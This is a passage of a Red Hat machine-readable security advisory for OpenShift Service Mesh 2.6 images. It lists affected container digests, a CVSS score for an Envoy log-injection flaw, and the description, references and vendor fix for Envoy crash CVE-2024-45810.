"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Malicious log injection via access logs"
},
{
"cve": "CVE-2024-45810",
"cwe": {
"id": "CWE-119",
"name": "Improper Restriction of Operations within the Bounds of a Memory Buffer"
},
"discovery_date": "2024-09-20T00:40:31.483825+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313687"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy. Envoy will crash when the http async client is handling `sendLocalReply` under some circumstances, such as websocket upgrade and requests mirroring. The http async client will crash during the `sendLocalReply()` in http async client if the http async client is duplicating the status code or if the destruction of the router is called at the destructor of the async stream while the stream is deferred or deleted. This issue occurs when the stream decoder is destroyed but it\u0027s reference is called in `router.onDestroy()`, causing a segment fault. This will impact ext_authz if the `upgrade` and `connection` header are allowed.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Envoy crashes for `LocalReply` in HTTP async client",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in Envoy related to the HTTP async client crashing during `sendLocalReply()` is classified as moderate severity rather than important due to the crash is contingent on particular scenarios, such as websocket upgrades and request mirroring, which may not be common in all deployments. Additionally, while the segmentation fault can disrupt service, it does not compromise data integrity or expose sensitive information.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45810"
},
{
"category": "external",
"summary": "RHBZ#2313687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313687"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45810",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45810"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45810",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45810"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q"
}
],
"release_date": "2024-09-20T00:15:03.153000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
